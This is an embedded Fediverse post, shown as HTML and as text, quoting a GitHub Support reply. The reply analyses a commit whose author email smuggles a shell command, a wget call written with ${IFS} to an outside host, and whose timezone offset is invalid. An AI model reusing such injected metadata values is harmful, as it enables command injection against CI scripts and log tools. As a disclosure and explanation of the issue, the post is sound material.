Embed Notice

HTML Code

<blockquote style="position: relative; padding-left: 55px;"><section><a href="https://infosec.exchange/users/ryanc/statuses/114663999424454264">Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JST</a><a href="https://infosec.exchange/@ryanc" title="ryanc@infosec.exchange"><img src="https://gnusocial.jp/avatar/174285-48-20231204225121.webp" width="48" height="48" alt="Ryan Castellucci (they/them) :nonbinary_flag:" style="position: absolute; left: 0; top: 0;">Ryan Castellucci (they/them) :nonbinary_flag:</a><div><ul><li></ul></div></section><article><p><a href="https://glauca.space/@q" rel="nofollow">@q</a></p><p>Formatting may get slightly mangled here, but should be decipherable:</p><p>GitHub Support, Jun 11, 2025, 8:17 AM UTC</p><p>Hi Ryan,</p><p>Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.</p><p>$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci &lt;wget${IFS}r.vc/ghe@ryanc.org&gt; 1668615481 -2456committer Ryan Castellucci &lt;wget${IFS}r.vc/ghe@ryanc.org&gt; 1668615481 -2456</p><p>Author and committer email:</p><p>author Ryan Castellucci &lt;wget${IFS}r.vc/ghe@ryanc.org&gt;</p><p>That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).</p><p>Timestamps:</p><p>1668615481 -2456</p><p>The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.</p><p>Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.</p><p>In the meantime, if this commit came from an external contributor or looks unintended, we recommend:</p><ul><li><p>Inspecting how it got into the repository</p></li><li><p>Rewriting history to remove it (if it was part of a PR or forced push)</p></li><li><p>Checking your workflow or scripts for unsafe parsing of Git metadata</p></li></ul><p>Please give this a try and update me on how it goes.</p></article><footer><a rel="bookmark" href="https://gnusocial.jp/conversation/5183154#notice-10167581">In conversation</a><time datetime="2025-06-11T18:23:02+09:00" title="Wednesday, 11-Jun-2025 18:23:02 JST">about a year ago</time> <span>from <span><a href="https://infosec.exchange/@ryanc/114663999424454264" rel="external" title="Sent from infosec.exchange via ActivityPub">infosec.exchange</a></span></span><a href="https://infosec.exchange/@ryanc/114663999424454264">permalink</a><h4>Attachments</h4><ol><li><label><a rel="external" href="https://gnusocial.jp/attachment/4763575">Untitled attachment</a></label><br></li><li><label><a rel="external" href="https://gnusocial.jp/attachment/4763576">Untitled attachment</a></label><br></li><li><article><header><div>Domain not in remote thumbnail source whitelist: daaz.com</div><h5><a href="https://daaz.com/make/offer/domains/seeing.in">Seeing.in Domain Name Is Available to Buy - Domain Name Marketplace</a></h5><div></div></header><div>DaaZ, largest domain marketplace simple, easy &amp; secure platform to buy domain names.  Buy this Seeing.in  Domain at best price at DaaZ.</div><footer></footer></article></li></ol></footer></blockquote>

Corresponding Notice

Embed this notice
Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JSTRyan Castellucci (they/them) :nonbinary_flag:
- Q ✨
@q
Formatting may get slightly mangled here, but should be decipherable:
GitHub Support, Jun 11, 2025, 8:17 AM UTC
Hi Ryan,
Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.
$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456
Author and committer email:
author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>
That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).
Timestamps:
1668615481 -2456
The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.
Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.
In the meantime, if this commit came from an external contributor or looks unintended, we recommend:
- Inspecting how it got into the repository
- Rewriting history to remove it (if it was part of a PR or forced push)
- Checking your workflow or scripts for unsafe parsing of Git metadata
Please give this a try and update me on how it goes.
In conversationabout a year ago from infosec.exchangepermalink
Attachments
1. Untitled attachment
2. Untitled attachment
3. Domain not in remote thumbnail source whitelist: daaz.com
  Seeing.in Domain Name Is Available to Buy - Domain Name Marketplace
  DaaZ, largest domain marketplace simple, easy & secure platform to buy domain names. Buy this Seeing.in Domain at best price at DaaZ.

Public

Embed Notice

HTML Code

Corresponding Notice